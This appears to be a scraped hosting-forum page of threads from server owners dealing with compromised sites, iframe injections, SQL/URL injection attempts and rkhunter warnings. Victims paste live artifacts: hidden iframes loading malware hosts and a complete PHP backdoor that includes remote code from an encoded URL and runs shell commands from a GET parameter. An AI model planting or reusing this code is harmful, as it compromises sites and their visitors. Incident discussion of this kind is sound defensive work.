Iframe Injection And Rkhunter Warnings

Aug 25, 2007

I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.

Code:
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
what is the reason and how to fix that ?


and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem :
rkhunter results:

Code:
Checking system commands...

Performing 'strings' command checks
Checking 'strings' command [ OK ]

Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]

Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/passwd [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/slocate [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]
/usr/local/bin/perl [ OK ]
/usr/local/bin/rkhunter [ OK ]

Checking for rootkits...

Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
****`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]

Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]

Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]

Performing trojan specific checks
Checking for enabled xinetd services [ None found ]
Checking for Apache backdoor [ Not found ]

Performing Linux specific checks
Checking kernel module commands [ OK ]
Checking kernel module names [ OK ]
Checking the network...

Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]

Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]

Checking the local host...

Performing system boot checks
Checking for local host name [ Found ]
Checking for local startup files [ Found ]
Checking local startup files for malware [ None found ]
Checking system startup files for malware [ None found ]

Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]

Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]

Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...

Checking version of Exim MTA [ OK ]
Checking version of GnuPG [ Warning ]
Checking version of Apache [ Skipped ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of PHP [ OK ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ OK ]

System checks summary
=====================

File properties checks...
Required commands check failed
Files checked: 129
Suspect files: 6

Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0

Applications checks...
Applications checked: 8
Suspect applications: 2

The system checks took: 3 minutes and 12 seconds

All results have been written to the logfile (/var/log/rkhunter.log)

One or more warnings have been found while checking the system.

Please check the log file (/var/log/rkhunter.log)

View 5 Replies


ADVERTISEMENT

Rkhunter 1.3.0 Warnings

Oct 5, 2007

I was testing the new RKHunter 1.3.0, and found a few warnings:

Code:
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/ldd [ Warning ]
/usr/bin/whatis [ Warning ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
Investigating the logs found this:

Code:
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Same result in two different RHE 4 boxes... just to verify that this is a false positive , do you have the same results in your RHE 4 boxes while running "rkhunter -c" ?

View 2 Replies View Related

Iframe Injection

Jul 22, 2009

Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.

The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...

1. The server does NOT have Joomla or Wordpress.

2. The injection seemed to hit every html page whether the page was active on the site or not.

3. The injection hit only one account.

I have checked /var/log/messages and /var/log/secure and find nothing.

What I don't have is proper ftp logging to determine whether the injection came from that method.

Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.

I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.

View 13 Replies View Related

Iframe Injection

Jun 9, 2007

One of my site index page is having iframe injections. I am not sure about the reason. page is chmod to 644 under php.ini dl() is even disabled.

But still person is some how able to inject iframe that redirects the page to some other url.

Any suggestions how to fix that ? any mod_rewrite rule or anything for this?

View 9 Replies View Related

BEWARE -Sudden Iframe Injection Attacks, Catastrophic Results

Sep 4, 2007

All my sites on both my hosting accounts are infected with an iframe.

At the end of the index.html files the malicious code just appeared...suddenly 3 weeks ago.

The host blamed Joomla so I took the appropriate steps:

Upgraded my Joomla to the latest version, changed the whole account username and password, changed the configuration and template to unwriteable.

It stopped the injection for a few days but then it came back.
I would also like to add that 2 other sites on my account, one simple index.html file and an old website I have that is totally HTML with nothing to do with Joomla also got infected.

The iframe also infected a Drupal install I did as a test.

So according to these fact is this a Hosting Company not taking responsibility or can a Joomla site infected spread to other normal HTML sites and different CMS's on the server?

This situation is ruinning me and I strongly suspect it's a Hosting problem and not Joomla.

Any expert opinions from true professionals would be appreciated because if I can prove that it's not a Joomla issue I might take legal action against the hosting company since this has cost me dozens of hours of work and several hundred dollars of lost revenue.

I am attaching the iframe exploit. It installs itself on every index file...in every folder - components, mambots, ect..additionally it attaches itself on any and every kind of addon that has an index.html file.

View 2 Replies View Related

Hivelocity Warnings

Oct 15, 2009

If any of you are with or going with Hivelocity here are a few things we have encountered today:

We asked to cancel our Virtuozzo lisense at the end of this billing month which would be the 22nd, they then went ahead and cancelled it straight away meaning we had no backups for our VPS clients.

We then asked for them to install windows 2008 server onto our machine it took them from 12pm - 9pm to complete this.

After logging in to our billing system we find a new hard drive added to our server which one we did not ask for and two we do not need adding an extra $150 onto our server bill.

Overall today has been a real pain in the **** with them, yes I agree they are a fantastic host but the fact we have been billed for something we never asked for has completely annoyed me.

View 14 Replies View Related

Post Your CSF Score & Warnings

May 26, 2007

We were able to get the score up to 62/70. Will need the server management company's advice and help to try and get rid of more of the red warnings.

What is your score and which red warnings do you have left? Post them please.

Score: 62/70.

Will ask server management company about these red warnings:
A1. /dev/shm isn't mounted with the noexec,nosuid options (currently: none). You should consider adding a mountpoint into /etc/fstab for /dev/shm with those options
A2. You should install the mod_evasive apache module from source to help prevent DOS attacks against apache. Note that this module breaks FrontPage functionality
A3. You should modify /usr/local/lib/php.ini and set:
enable_dl = off
This prevents users from loading php modules that affect everyone on the server. Note that if use dynamic libraries, such as ioncube, you will have to load them directly in php.ini
A4. On most servers anacron isn't needed and should be stopped:
service anacron stop
chkconfig anacron off
chkconfig --del anacron

Probably going to leave these red warnings for now:
B1. For ultimate SSH security, you might want to consider disabling PasswordAuthentication and only allow access using PubkeyAuthentication. For more information read this article and this article
B2. You should modify /usr/local/lib/php.ini and disable commonly abused php functions, e.g.:
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
Some client web scripts may break with some of these functions disabled, so you may have to remove them from this list
B3. To reduce the risk of hackers accessing all sites on the server from a compromised PHP web script, you should enable phpsuexec when you build apache/php. Note that there are sideeffects when enabling phpsuexec on a server and you should be aware of these before enabling it
B4. You have package updating disabled, this can pose a security risk as OS vendor and cPanel security updates may not be applied in a timely manner WHM > Update Config >cPanel Package Updates > Automatic

View 2 Replies View Related

Apache :: Periodic Request Timed-out Warnings

Sep 21, 2013

So I've set everything up manually a few times before now, but I got so bored of configuring everything for a manual install I just said screw it and used XAMPP this time - so my circumstances are not completely ideal.

Basically what I am looking to find out is how to improve loading speeds for Apache, PHP and MySQL on my dedi server?

The server I have is of the following spec:
Intel Xeon CPU E5-1650 V2 (3.50Ghz with 12 cores total)
64 GB DDR3 ECC
2 x 2TB SATA3 (RAID 0/1)

use Windows Web 2008 R2 so only 32GB of the RAM is usable.

With all the abive aside, here is the important part: Whilst people are browsing the websites I have configured they are random hit with a blank white page saying "Your request has timed out. Please retry the request." - I have about 100 unique hits daily and a lot of people report the same problem, and I have even had it myself.

It feels as if the server has much more power than Apache and co. is trying to utilize - what can I do?

View 4 Replies View Related

Sql Injection

Jul 8, 2009

I had a non client send me an email about being hacked. apparently the hacker is using a program/command line and is entering this into the db:

user=' &pass1=111-222-1933email@adress.tst&pass2=test&submit=
create%20Account

any way he can patch up his navicat database to stop this?

View 9 Replies View Related

URL Injection

Aug 17, 2007

I've experienced so much hacker attack lately. Hosted wiht hostforweb.com if that makes any difference.

Last issue I have is:
Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

How I can secure my server against such attacks?

Also I need to resolve this issue ASAP but can not find the file and I don't know what to do.

Report:

Sample log report including date and time stamp:

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:03
-0500] GET
/awstats/data/awstats1...marythecelticlady.com.txt/admin/index.php?o=[url]HTTP/1.1 302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET /admin/index.php?o=[url]HTTP/1.1
302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET
/awstats/data/admin/index.php?o=[url]
HTTP/1.1 302 228 - libwww-perl/5.808 - -

WHAT NEEDS TO BE DONE HERE and where to located it? Your help is greatly appreciated.

View 0 Replies View Related

Plesk 11.x / Windows :: Local Backup Completed With Warnings

Nov 19, 2014

Operating System: Windows Server 2008 R2 Std
Plesk: Parallels Plesk Panel 11.5

We have scheduled a server local backup via Backup Manager and found that backup has got completed with warnings.

We have checked logs from location : E:Program Files (x86)ParallelsPleskPMMsessions2014-11-18-144536.191psadump.log

8052: Warning 18/11/2014 18:18:55.028 : Exception ignored ( System.ComponentModel.Win32Exception: The system cannot find the file specified at psabackupcommon.FileUtils.DeleteFile(String fileName) at psadumpagent.ArchiveNode.doStdClose() )
8052: Debug 18/11/2014 18:18:55.028 : Add mail name 'abc@xxxx.com' directory 'F:Plesk PrivateTemp21282721-4181-4c0f-9520-c232f00b7668MailMigratorabc@xxxx.com to dump

[Code] .....

View 3 Replies View Related

PhpMyAdmin SQL Injection

Dec 13, 2008

Anyone using phpMyAdmin for MySQL admin, you need to know about a newly discovered attack vector.

Here's the official announcement: [url]

The key to this is in their description, "A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter."

A logged in user... This attack is a combination of SQL injection through CSRF. In other words, you'd have to be logged into your phpMyAdmin program, hit a website setup for CSRF, and then the attacker could have access to your phpMyAdmin as you.

If there's interest here, I could write up a detailed description of CSRF and how to prevent this type of attack.

Just let me know...

You should upgrade immediately to either phpMyAdmin 2.9.11.4 or 3.1.1.0 or apply patch 12100.

View 9 Replies View Related

Plesk 12.x / Linux :: Servershield Errors And Warnings In Daily Cron

Nov 19, 2014

I get these emails every day, sometimes less warnings, but today there are plenty again:

Subject: Cron <root@plesk01> /opt/psa/admin/bin/php -c '/opt/psa/admin/conf/php.ini' -dauto_prepend_file=sdk.php '/opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php'

Code:

PHP Notice: Undefined property: stdClass::$response; File: /opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php, Line: 21

PHP Notice: Trying to get property of non-object; File: /opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php, Line: 21

[Code] .....

They started showing up when I upgraded to Plesk 12 and activated the server shield extension. The server is an Ubuntu 12.04 LTS.

View 5 Replies View Related

Reverse Proxy And SQL Injection

Jun 30, 2009

Does deploying a reverse proxy in front of the web/db server reduce the threat of SQL injection?

Emphasis on 'reduce' the threat - or does it provide no help at all?

View 3 Replies View Related

Php Injection & Session Hacking

May 28, 2008

I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.

And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?

------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
$query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
region_comments = '". $regcom."' WHERE region_id =" .$id;
mysql_query($query);

......
-------------------------------------------------------------------

View 3 Replies View Related

Prevention LFI And SQL Injection Attacks

May 12, 2008

i am seeing a lot of Local file inclusion (LFI) and mysql injection attacks quite often directed to php scripts.

what is the way to prevent them? would installing mod_security to apache work?

View 6 Replies View Related

Rkhunter

Oct 25, 2009

Since my Centos updated from 5.3 to 5.4 i am getting this "error" with rkhunter.

Warning: Possible promiscuous interfaces:
'ifconfig' command output: UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
'ip' command output: eth1
'ip' command output: eth0

I already ran:
rkhunter --propupd

View 8 Replies View Related

Rkhunter Log

Sep 27, 2007

about my rkhunter`s log. It gives some warnings but i dont know if they are really important ones.

Here are the warnings it gives :

Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa
Warning: The SSH configuration option 'PermitRootLogin' has not been set.
The default value may be 'yes', to allow root access.
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Application 'gpg', version '1.2.6', is out of date, and possibly a security risk.
Warning: Application 'openssl', version '0.9.7a', is out of date, and possibly a security risk.
Warning: Application 'php', version '4.3.9', is out of date, and possibly a security risk.

I am using plesk and i am using yum update for updating files and scripts. So i dont know how can i update gpg php and openssl. Plus for some time it said like port 2006 is open and possible trojan backdoor. But when i check now it doesnt give any error like that.

if there is any major problem at those logs or not?

if someone also wants i can attach the full rkhunter.log or only warning output rkhunter.log

View 5 Replies View Related

Hidden Iframe Or Something

May 1, 2009

so when i look at my source code, i see this all the way to the bottom

<iframe src="http://viewhit.biz" scrolling="no" frameborder="0" height="1" width="1"></iframe>

but i never added that... and when i look at my footer file (which i include to the bottom of all my other files), its not there. even when i transfer the current one from my server, so its definetly not in that file

any idea how else that could have been added, and how i can take it off. my sites also been acting kind of weird lately, scrolling all the way to the bottom any time a page loads, which is really annoying

View 7 Replies View Related

Iframe And Micfo

Mar 11, 2008

For the second time in the last 2 months I got an iframe (leohin.com) added to a php script and index.html pages.

My site is hosted on Micfo (support has disappeared recently. My last 3 tickets were unanswered).

I have some newbie questions regarding those iframe injections.

How do they add these ?

Did they hack the host or only my website ?

Anyone hosted on Micfo also got those leohin.com iframes ?

Anyway I'm really disappointed by the lack of support by Micfo.

I'm certainly moving soon.

View 2 Replies View Related

Atack Using Iframe

Dec 16, 2008

I am experiencing a problem, which I think is DDoS Atack.

well, what's happening is that my blog is receiving many requests to do so, asking you download the file xmlrcp.php (part of wordpress) has tried to block this URL that does inframe to receive such visits my blog, but you do not succeeded;

No longer trying to block. htacess etc, nothing else's right!

View 11 Replies View Related

Iframe Js Attack

Apr 19, 2008

It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory.

We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess.

I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?

This is a RHE 4 + cPanel server, This is the iframe code:

iframe width=1 height=1 src=[url]

View 14 Replies View Related

Hacked From Bis.iframe.ru

Jun 22, 2007

today all the sites with files nobody:nobidy get hacked, every files was repleaced with

Code:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
and a .htaccess files we have decode it the url are:

htmltags.ru
mshtml.ru
iframe.ru

we know that we should use SuExec to stop nobody files problem, but now we would a help to find where they got access, i have google and i have found this post but without solution:

[url]

View 8 Replies View Related

<iframe> Worms

Jul 13, 2007

I have recently found that several of the web sites that I'm hosting on my server have worms that when you access the web sites in Internet Explorer, the antivirus is triggered. When you look an the source code there's always an iframe that loads a remote web page with a worm. Have you seen it already? How did these web sites get infected? Is there an easy way to clean them or is it the hard way? I ran a clamscan on the server and it didn't find anything

View 7 Replies View Related

Does CISCO ASA Firewall Block SQL And XSS Injection?

Dec 25, 2008

Does CISCO ASA Firewall block SQL and XSS Injection? If not, then which are the firewalls available which do this job. I have checked web application firewalls and found them to be too costly for my budget. What are the other cheap options available?

View 3 Replies View Related

Win 2003 + Mssql Attacks Injection

Jun 2, 2008

I see on one server with windows 2k3 and sql 2000 alot of Injection attemts(lucky so far) and 90% come from china.

Is there any way on iis6 to put range ban like 123.52.0.0 - 123.55.255.255 so to ban all that network?

View 1 Replies View Related

CHKROOTKIT Or RKHunter

Jul 29, 2009

which of the is better?

CHKROOTKIT or RKHunter?

i want to install and run it via ssh.

View 14 Replies View Related

Rkhunter & Chkrootkit?

Jun 30, 2008

I've honestly never had to worry about protecting myself from exploits until this week, when I found out somebody agined access t othe server using an old script on an old account (teach me to delete client accounts when they leave me, it did!)

I'm working on a new server and going through lots of posts on better securing it, and two things that are suggested is installing chkrootkit and rkhunter, and adding them to the daily cron jobs. Learned how to install and set up the daily script for chkrootkit, but here's what I'd like to do that I'm not sure how to go about, I'd like to a) be notified ONLY if there are changes in the daily scans (especially since there are a couple of false positives I'm aware of) and b) be e-mailed a full report once a week, whether or not there were any changes.

I've got rkhunter installed as well, but I can't seem to find a script that will properly execute it and e-mail it to me. Does anybody have one that works? I'd also like to only get an e-mail if there are changes, except for a once weekly scan result.

View 3 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved